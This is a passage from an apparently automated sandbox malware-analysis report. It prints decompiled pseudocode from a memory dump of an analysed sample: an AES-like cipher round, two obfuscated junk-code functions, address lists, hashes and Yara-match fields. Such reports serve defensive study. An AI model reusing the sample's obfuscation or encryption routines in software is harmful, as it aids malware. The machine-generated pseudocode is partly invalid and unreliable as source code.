				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t409 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
				_t478 = (_a4 >> 1) - 1;
				_a4 = _t478;
				if(_t478 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t383;
						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
						_v12 = _t560;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t409 =  &(_t409[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t358 = _a8;
				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				asm("rol edi, 0x8");
				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
				return _t274;
			}



















            0x00402fb0
            0x00402fbf
            0x00402fc8
            0x00402fd6
            0x00402fda
            0x00402fe3
            0x00402ff4
            0x00402ff7
            0x00402ffc
            0x00403005
            0x00403013
            0x00403018
            0x00403021
            0x00403031
            0x00403051
            0x00403054
            0x00403066
            0x0040306b
            0x00403080
            0x0040309d
            0x004030a0
            0x004030b1
            0x004030c6
            0x004030e6
            0x004030e9
            0x004030fb
            0x00403119
            0x00403136
            0x00403139
            0x0040314b
            0x00403160
            0x00403166
            0x0040316e
            0x0040316f
            0x00403172
            0x00403180
            0x00403190
            0x004031a2
            0x004031b4
            0x004031d0
            0x004031e3
            0x004031f0
            0x00403201
            0x00403218
            0x0040323a
            0x0040323d
            0x0040324e
            0x00403269
            0x00403280
            0x00403283
            0x00403295
            0x0040329d
            0x004032b2
            0x004032cf
            0x004032d2
            0x004032e3
            0x00403307
            0x00403317
            0x0040331a
            0x0040332c
            0x00403344
            0x00403347
            0x0040335a
            0x00403367
            0x00403379
            0x00403391
            0x004033b4
            0x004033b7
            0x004033c9
            0x004033de
            0x004033e4
            0x004033e4
            0x004033e7
            0x004033e7
            0x00403180
            0x0040344b
            0x00403454
            0x00403462
            0x004034c0
            0x004034c9
            0x004034d7
            0x00403539
            0x00403542
            0x0040354f
            0x00403552
            0x0040359e
            0x004035aa
            0x004035b3
            0x004035c0
            0x004035c7

            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
            • Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
            • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
            • Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0041E8F3, Relevance: .3, Instructions: 277COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 62%
            			E0041E8F3(void* __eax, signed char __ebx, void* __ecx, signed char __edx, signed int __edi, signed int __esi) {
				void* _t40;
				signed char _t41;
				signed char _t45;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				signed int _t49;
				intOrPtr _t50;
				void* _t56;

				_t47 = __esi;
				_t46 = __edi;
				_t45 = __edx;
				_t41 = __ebx;
				 *0xe2fd1d7 =  *0xe2fd1d7 + __edx;
				asm("adc eax, 0xa8db6d36");
				asm("stosb");
				_t40 = __eax - 0xb4;
				asm("scasd");
				asm("rol dword [0x9dd061cd], 0xb5");
				_pop( *0xe1d2416d);
				 *0xe3dae4f7 =  *0xe3dae4f7 ^ __edi;
				 *0x39bedc62 =  *0x39bedc62 << 0x38;
				if( *0x39bedc62 > 0) {
					L1:
					asm("scasb");
					_t40 = _t40 - 1;
					asm("adc edx, [0x3b33d2bc]");
					_push( *0x401408c7);
					 *0xe6633f06 =  *0xe6633f06 | _t46;
					asm("rcl byte [0x6668ccc6], 0x3f");
					asm("rcl byte [0x2e3ce22], 0xcc");
					_t1 = _t47;
					_t47 =  *0xf7731b23;
					 *0xf7731b23 = _t1;
					asm("sbb edi, [0xfbe21aeb]");
				} else {
					__edx =  *0x457f937f * 0xdeae;
					_push( *0x6774c6b9);
					asm("sbb ecx, [0x54b7063f]");
					__esp = __esp +  *0xac24dbc0;
					 *0x8743fcc8 =  *0x8743fcc8 << 0x9f;
					 *0xbbe07ec4 =  *0xbbe07ec4 & __esi;
					if(__cl < 0) {
						goto L1;
					} else {
						__edx = __edx ^  *0xb2d2ea70;
						asm("cmpsb");
						asm("adc [0x85ecdabe], ebx");
						__ecx =  *0x9acd1a60 * 0x731b;
						__ebx = __ebx ^  *0x1f95ecfc;
						__esp = __esp ^ 0x2d75f415;
						__al = __al - 0xa8;
						_pop( *0x377189ff);
						_push( *0x19b3a617);
						asm("sbb ebp, 0xd9f4fa21");
						__edx = __edx -  *0xf6fb03fc;
						__bl = __bl + 0xb5;
						asm("sbb edx, 0x749be491");
						if(__bl > 0) {
							goto L1;
						} else {
							__ebx =  *0x613c37f * 0x54ff;
							_pop( *0xd83ec0c8);
							asm("movsw");
							if(__ebx < 0) {
								goto L1;
							} else {
								__edx =  *0xe3de797c * 0x433a;
								__ecx =  *0x47795d06;
								 *0x30c1a5a8 =  *0x30c1a5a8 << 0xca;
								__eax =  *0xba24efc4;
								__edx =  *0xdf64cbf1;
								_push(__esi);
								__edi = __edi &  *0xff4674d1;
								asm("sbb edx, [0x2118aa6d]");
								asm("scasb");
								asm("rcl dword [0x10c4cedd], 0x0");
								asm("rcr dword [0xbcf142d1], 0xbc");
								__ebx = __ebx + 1;
								if(__ebx >= 0) {
									goto L1;
								} else {
									__esp =  *0x3715107d * 0x5ea;
									__edi = __edi + 1;
									asm("ror dword [0x368ba083], 0xac");
									 *0x9340670f =  *0x9340670f & __edi;
									 *0xd3cad468 =  *0xd3cad468 + __ecx;
									__ebx = __ebx +  *0xbc68af2b;
									__bh = __bh + 0xd2;
									 *0x132845e6 =  *0x132845e6 << 0xda;
									asm("rcl byte [0x170b903c], 0x9");
									__edx = __edx + 1;
									__cl = 0x82;
									_pop(__eax);
									if(__edx > 0) {
										goto L1;
									} else {
										__esp =  *0x45caa07f * 0x82f6;
										__esp =  *0x45caa07f * 0x82f6 -  *0xe9f86e39;
										_pop(__eax);
										 *0xd3de6735 =  *0xd3de6735 ^ __esp;
										 *0x9415a1df =  *0x9415a1df << 0x40;
										asm("adc edx, [0x3a6b4595]");
										asm("rol dword [0x9ddbb22e], 0xb1");
										asm("sbb ebx, [0xfca3febb]");
										asm("scasd");
										if(( *0xa4024d12 & __ah) > 0) {
											goto L1;
										} else {
											__ebp =  *0x236c967f * 0x84cd;
											 *0xf1bec9a =  *0xf1bec9a >> 0xb1;
											__cl =  *0xf88669e2;
											 *0xf88669e2 = 0x82;
											 *0xff5c0c1f =  *0xff5c0c1f - __esp;
											1 +  *0x236c967f * 0x84cd = 1 +  *0x236c967f * 0x84cd -  *0xe6eaeeb9;
											asm("stosd");
											_push(1 +  *0x236c967f * 0x84cd -  *0xe6eaeeb9);
											__edx = __edx + 1;
											asm("rol byte [0x78ca39e2], 0xf3");
											 *0x31bf49c6 =  *0x31bf49c6 >> 0;
											asm("sbb [0xb05fbbc], esi");
											__ebx =  *0x9d31e9ee;
											__edx = __edx -  *0x440fbfa3;
											asm("adc [0xd263f5], edi");
											if(( *0x452466c2 & __edi) >= 0) {
												goto L1;
											} else {
												asm("ror dword [0xeb0ea479], 0xeb");
												__ecx = __ecx - 0x5d76b3f8;
												 *0x41a98d17 = __ebx;
												asm("adc edi, [0xb2031191]");
												__edx = __edx + 0x9620d5db;
												__bl = __bl -  *0x4bd35cc6;
												__ebp =  *0x640291e;
												__esi = __esi + 1;
												asm("sbb ch, [0xd93a56ca]");
												_t18 = __edx;
												__edx =  *0x827f1ed3;
												 *0x827f1ed3 = _t18;
												if(( *0x6be83698 & __eax) != 0) {
													goto L1;
												} else {
													 *0xfc949b7a =  *0xfc949b7a << 0xe3;
													 *0x70e2c5d3 = __esi;
													__edx =  *0x2be3646a * 0x11e1;
													__esi = __esi -  *0x814975f4;
													 *0xaf063803 =  *0xaf063803 ^ __ecx;
													 *0xb7bcccd8 = __ecx;
													 *0x89a151ce =  *0x89a151ce >> 0xa3;
													asm("rcl dword [0xbafeab2d], 0xce");
													asm("scasb");
													__ecx = __ecx + 1;
													__esp = __esp ^  *0xe026e068;
													__ecx = __ecx - 1;
													asm("rcl dword [0xcfa8489e], 0x96");
													 *0x3ab1481e =  *0x3ab1481e ^ __esi;
													__esi = __esi ^ 0x6a81e3bf;
													if(__esi != 0) {
														goto L1;
													} else {
														_push( *0x6d8df075);
														 *0xd0f82e6e =  *0xd0f82e6e >> 0x77;
														_t21 = __edi;
														__edi =  *0xd57e6d35;
														 *0xd57e6d35 = _t21;
														asm("scasb");
														_push(__ebp);
														 *0xd648148e = __edi;
														__ebp = __ebp - 0xb4e4c5d8;
														__ecx =  *0xfb106560 * 0x68ce;
														asm("adc edi, [0xafab3ad9]");
														_push( *0x82c38c1e);
														if(__ecx >= 0) {
															goto L1;
														} else {
															asm("adc ebp, 0xb324af73");
															asm("scasd");
															_t24 = __ecx;
															__ecx =  *0x4f2976ce;
															 *0x4f2976ce = _t24;
															asm("rcl byte [0xfef21eb3], 0xc8");
															__edi = __edi & 0xc35f196c;
															asm("sbb cl, 0xb5");
															__al = __al + 0x3c;
															asm("adc ebp, [0x94430092]");
															__eax =  *0x9cd4376b * 0xfda8;
															__ebx = __ebx &  *0x8cac4f27;
															 *0xbd8b2fd3 =  *0xbd8b2fd3 & __esi;
															__edx = __edx - 1;
															__ebp =  *0x90b4da35;
															__eax =  *0x22f83e2b;
															 *0xb84a4cd3 =  *0xb84a4cd3 >> 0x45;
															__bl = __bl + 0x8a;
															__esp = __eax;
															__edi =  *0x7b9c6b69 * 0x5ae3;
															 *0x768b6c1d =  *0x768b6c1d + __ebp;
															asm("adc dh, 0x63");
															__esp =  *0xbe838564;
															asm("adc edi, [0xb416480d]");
															asm("stosd");
															__eax = __eax -  *0xa5e2e526;
															if(__eax < 0) {
																goto L1;
															} else {
																_t31 = __ebp;
																__ebp =  *0xdfcbe470;
																 *0xdfcbe470 = _t31;
																__eax = __eax |  *0x896092ee;
																__ebx = __ebx +  *0x7697839a;
																 *0x218cd40a =  *0x218cd40a << 0x12;
																__eax = __eax ^ 0xf9b90bf8;
																 *0x22fbe69c =  *0x22fbe69c - __esp;
																__eax = __eax & 0x9aa18339;
																 *0x1b27479c =  *0xdfcbe470;
																__ah = __ah ^ 0x0000000a;
																asm("adc edx, 0x195a2f95");
																__eax = __eax | 0xbf5a01f4;
																__ebx = __ebx + 1;
																__ecx =  *0xeec81e60 * 0xbf49;
																asm("sbb ebx, [0x6e2db823]");
																asm("ror byte [0x8df1d9c9], 0xdb");
																 *0x9b714a24 =  *0x9b714a24 >> 0x37;
																__eax = __eax + 1;
																_pop( *0x3b9e1e66);
																 *0x7ac5467 =  *0x7ac5467 << 0xbc;
																asm("movsw");
																 *0x5674b761 =  *0x5674b761 + __edx;
																if( *0x5674b761 < 0) {
																	goto L1;
																} else {
																	__ebp =  *0x3cd1847c * 0x33c7;
																	asm("rol dword [0xdc8419ec], 0xb7");
																	asm("ror dword [0x5400ce83], 0x96");
																	__esi = __esi - 1;
																	asm("cmpsb");
																	__eax = __eax - 1;
																	asm("adc ecx, 0xc9fa41bd");
																	__cl =  *0x76248e3a;
																	asm("sbb [0xcaf9e1ea], eax");
																	__esi = __esi ^  *0xc56c4062;
																	_push( *0x2e37851f);
																	_push(__edx);
																	__ebp = 1 +  *0x3cd1847c * 0x33c7;
																	__al = __al | 0x00000088;
																	asm("sbb edx, [0x97de79c]");
																	if(__edx > 0) {
																		goto L1;
																		do {
																			do {
																				do {
																					do {
																						do {
																							goto L1;
																						} while (( *0x445a0020 & _t45) != 0);
																						L1();
																						_t47 = _t47 &  *0xa39a26e8;
																						asm("adc [0xfa8c6dc4], ecx");
																						_t6 = _t50;
																						_t50 =  *0x20d04992;
																						 *0x20d04992 = _t6;
																						 *0xa24eab93 =  *0xa24eab93 >> 0xcf;
																						 *0xdb117210 =  *0xdb117210 + _t41;
																						 *0xc57f6f0a =  *0xc57f6f0a & _t41;
																						_t56 = _t48 -  *0x5b414723;
																					} while (_t56 > 0);
																					 *0xdb3f7077 =  *0xdb3f7077 >> 0x12;
																				} while (_t56 <= 0);
																				asm("ror dword [0x636c3a76], 0xf2");
																				_t40 = _t40 - 1;
																				asm("rcl byte [0xd14aa1e5], 0x2f");
																				 *0x29c3fe66 =  *0x29c3fe66 ^ _t48;
																			} while ( *0x29c3fe66 < 0);
																			 *0x4e5feb70 =  *0x4e5feb70 >> 0xe6;
																			asm("cmpsb");
																			_t46 =  *0x1d4e9123;
																			_t47 = _t47 - 1;
																			_pop(_t49);
																			_pop( *0xc2c9ce03);
																			asm("adc ebx, 0x7e887a0e");
																			_t40 = _t40 + 1;
																			L1();
																			_t48 = _t49 &  *0xecd03ae8;
																		} while (_t48 == 0);
																		asm("adc edx, [0x34b9dd91]");
																		return _t40;
																	} else {
																		__al = __al | 0x0000004e;
																		return __eax;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}












            0x0041e8f3
            0x0041e8f3
            0x0041e8f3
            0x0041e8f3
            0x0041e8f9
            0x0041e8ff
            0x0041e904
            0x0041e905
            0x0041e907
            0x0041e908
            0x0041e90f
            0x0041e915
            0x0041e91b
            0x0041e922
            0x0041e80a
            0x0041e80a
            0x0041e80b
            0x0041e80c
            0x0041e812
            0x0041e818
            0x0041e81e
            0x0041e825
            0x0041e82c
            0x0041e82c
            0x0041e82c
            0x0041e832
            0x0041e928
            0x0041e928
            0x0041e932
            0x0041e938
            0x0041e93e
            0x0041e945
            0x0041e952
            0x0041e95b
            0x00000000
            0x0041e961
            0x0041e961
            0x0041e967
            0x0041e968
            0x0041e96e
            0x0041e978
            0x0041e97e
            0x0041e984
            0x0041e986
            0x0041e98c
            0x0041e998
            0x0041e99e
            0x0041e9a4
            0x0041e9a7
            0x0041e9ad
            0x00000000
            0x0041e9b3
            0x0041e9b3
            0x0041e9bd
            0x0041e9c3
            0x0041e9c5
            0x00000000
            0x0041e9cb
            0x0041e9cb
            0x0041e9d5
            0x0041e9db
            0x0041e9e2
            0x0041e9e7
            0x0041e9ed
            0x0041e9ee
            0x0041e9f4
            0x0041e9fa
            0x0041e9fb
            0x0041ea02
            0x0041ea09
            0x0041ea0a
            0x00000000
            0x0041ea10
            0x0041ea10
            0x0041ea1a
            0x0041ea1b
            0x0041ea22
            0x0041ea28
            0x0041ea2e
            0x0041ea34
            0x0041ea37
            0x0041ea3e
            0x0041ea45
            0x0041ea46
            0x0041ea48
            0x0041ea49
            0x00000000
            0x0041ea4f
            0x0041ea4f
            0x0041ea59
            0x0041ea5f
            0x0041ea60
            0x0041ea66
            0x0041ea6d
            0x0041ea73
            0x0041ea7a
            0x0041ea86
            0x0041ea87
            0x00000000
            0x0041ea8d
            0x0041ea8d
            0x0041ea97
            0x0041ea9e
            0x0041ea9e
            0x0041eaa4
            0x0041eaab
            0x0041eab1
            0x0041eab2
            0x0041eac5
            0x0041eac6
            0x0041eacd
            0x0041eada
            0x0041eae6
            0x0041eaec
            0x0041eaf8
            0x0041eafe
            0x00000000
            0x0041eb04
            0x0041eb04
            0x0041eb0b
            0x0041eb17
            0x0041eb29
            0x0041eb2f
            0x0041eb35
            0x0041eb3b
            0x0041eb41
            0x0041eb48
            0x0041eb4e
            0x0041eb4e
            0x0041eb4e
            0x0041eb54
            0x00000000
            0x0041eb5a
            0x0041eb5a
            0x0041eb61
            0x0041eb67
            0x0041eb71
            0x0041eb77
            0x0041eb7d
            0x0041eb83
            0x0041eb90
            0x0041eb97
            0x0041eb98
            0x0041eb99
            0x0041eb9f
            0x0041eba0
            0x0041eba7
            0x0041ebad
            0x0041ebb3
            0x00000000
            0x0041ebb9
            0x0041ebb9
            0x0041ebbf
            0x0041ebcc
            0x0041ebcc
            0x0041ebcc
            0x0041ebd2
            0x0041ebd3
            0x0041ebd4
            0x0041ebda
            0x0041ebe0
            0x0041ebea
            0x0041ebf0
            0x0041ebf6
            0x00000000
            0x0041ebfc
            0x0041ebfc
            0x0041ec0b
            0x0041ec0c
            0x0041ec0c
            0x0041ec0c
            0x0041ec18
            0x0041ec1f
            0x0041ec25
            0x0041ec28
            0x0041ec2a
            0x0041ec30
            0x0041ec3a
            0x0041ec40
            0x0041ec46
            0x0041ec47
            0x0041ec53
            0x0041ec54
            0x0041ec62
            0x0041ec6b
            0x0041ec6c
            0x0041ec76
            0x0041ec7c
            0x0041ec7f
            0x0041ec85
            0x0041ec8b
            0x0041ec8c
            0x0041ec98
            0x00000000
            0x0041ec9e
            0x0041ec9e
            0x0041ec9e
            0x0041ec9e
            0x0041eca4
            0x0041ecaa
            0x0041ecb0
            0x0041ecb7
            0x0041ecc2
            0x0041ecc8
            0x0041ecd4
            0x0041ecda
            0x0041ecdd
            0x0041ece3
            0x0041ece8
            0x0041ece9
            0x0041ecf3
            0x0041ecff
            0x0041ed06
            0x0041ed0d
            0x0041ed0e
            0x0041ed14
            0x0041ed27
            0x0041ed2a
            0x0041ed30
            0x00000000
            0x0041ed36
            0x0041ed36
            0x0041ed46
            0x0041ed4d
            0x0041ed54
            0x0041ed5b
            0x0041ed62
            0x0041ed63
            0x0041ed69
            0x0041ed74
            0x0041ed7a
            0x0041ed80
            0x0041ed86
            0x0041ed89
            0x0041ed8a
            0x0041ed8c
            0x0041ed9e
            0x00000000
            0x0041e80a
            0x0041e80a
            0x0041e80a
            0x0041e80a
            0x0041e80a
            0x00000000
            0x00000000
            0x0041e846
            0x0041e84b
            0x0041e851
            0x0041e857
            0x0041e857
            0x0041e857
            0x0041e863
            0x0041e86a
            0x0041e870
            0x0041e87c
            0x0041e87c
            0x0041e884
            0x0041e884
            0x0041e891
            0x0041e898
            0x0041e899
            0x0041e8a0
            0x0041e8a0
            0x0041e8ac
            0x0041e8b3
            0x0041e8b4
            0x0041e8ba
            0x0041e8bb
            0x0041e8bc
            0x0041e8c2
            0x0041e8ce
            0x0041e8cf
            0x0041e8d4
            0x0041e8d4
            0x0041e8e6
            0x0041e8f2
            0x0041eda4
            0x0041edaa
            0x0041edac
            0x0041edac
            0x0041ed9e
            0x0041ed30
            0x0041ec98
            0x0041ebf6
            0x0041ebb3
            0x0041eb54
            0x0041eafe
            0x0041ea87
            0x0041ea49
            0x0041ea0a
            0x0041e9c5
            0x0041e9ad
            0x0041e95b

            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 5937cafd4959b6dc36f5086ae70ad4c42cf4293cb40f9d2e03c0d98404eead57
            • Instruction ID: b0d0a089becf8dbf853df9768c1ff1ffba6d6e708cb3e2c8252f8990e9762a75
            • Opcode Fuzzy Hash: 5937cafd4959b6dc36f5086ae70ad4c42cf4293cb40f9d2e03c0d98404eead57
            • Instruction Fuzzy Hash: B3D1B732908742CFD715EF38D98AA417FB1F70A724B14439ED9A1931E1C77825A6CF89
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0041D300, Relevance: .2, Instructions: 238COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 53%
            			E0041D300(void* __eax, signed char __ebx, void* __ecx, void* __esi) {
				signed char _t22;
				signed char _t26;
				signed char _t27;
				void* _t29;
				void* _t30;
				signed char _t32;
				signed char _t33;
				signed char _t34;
				signed int _t37;
				signed int _t38;
				void* _t47;

				_t26 = __ebx;
				_t22 = __eax + 0x3ad96b0f;
				if(_t22 > 0) {
					L1:
					 *0x2bb20809 =  *0x2bb20809 ^ _t38;
					_t37 = _t36 - 0xf9;
					_push( *0x5c3f0d39);
					asm("sbb ebp, [0x7bfc4837]");
					 *0x4ccb6e8f =  *0x4ccb6e8f + _t37;
					 *0x33252c02 =  *0x33252c02 & _t22;
					asm("adc [0x14a4b01c], bl");
					asm("sbb eax, [0xa782c11e]");
					asm("rcr byte [0xbccb3a08], 0x70");
					asm("rol dword [0xdec681c5], 0x2b");
					_push( *0xdbd8b905);
					_t38 = _t38 -  *0x8d5c8564 | 0xc70d9e2b;
					asm("adc ebp, [0xd2aeaf05]");
					_pop(_t29);
					_push(0xe2a8d637);
					_t27 = _t26 |  *0xf8c0133e;
					asm("sbb esp, 0xe6900403");
					_push(_t29);
					 *0x4bff0661 = _t27;
					asm("adc esi, 0x4010fe62");
					_t30 = _t29 -  *0x293fe3fd;
					asm("sbb [0x4c0a2dbc], edi");
					 *0xe76ac8dc = _t30;
					 *0xd52a0296 =  *0xd52a0296 & _t37;
					_t26 = _t27 ^ 0x00000082;
					_t36 =  *0x7158972b;
					asm("ror dword [0x90539ee], 0xfb");
					 *0x9e0d5b33 =  *0x9e0d5b33 >> 0xdf;
					_t22 = (0x1f782644 &  *0x7323f70a) -  *0xf26185ed;
					_t32 = _t30 +  *0x76e609dd ^ 0x00000063;
					asm("adc dl, 0x4");
					 *0xee4f0add =  *0xee4f0add ^ _t38;
					_t47 = _t47 + 1;
					asm("ror byte [0xc11568b1], 0x58");
					_push( *0xfdd0567);
				} else {
					 *0x3a798377 =  *0x3a798377 - __ebx;
					_push(__ebp);
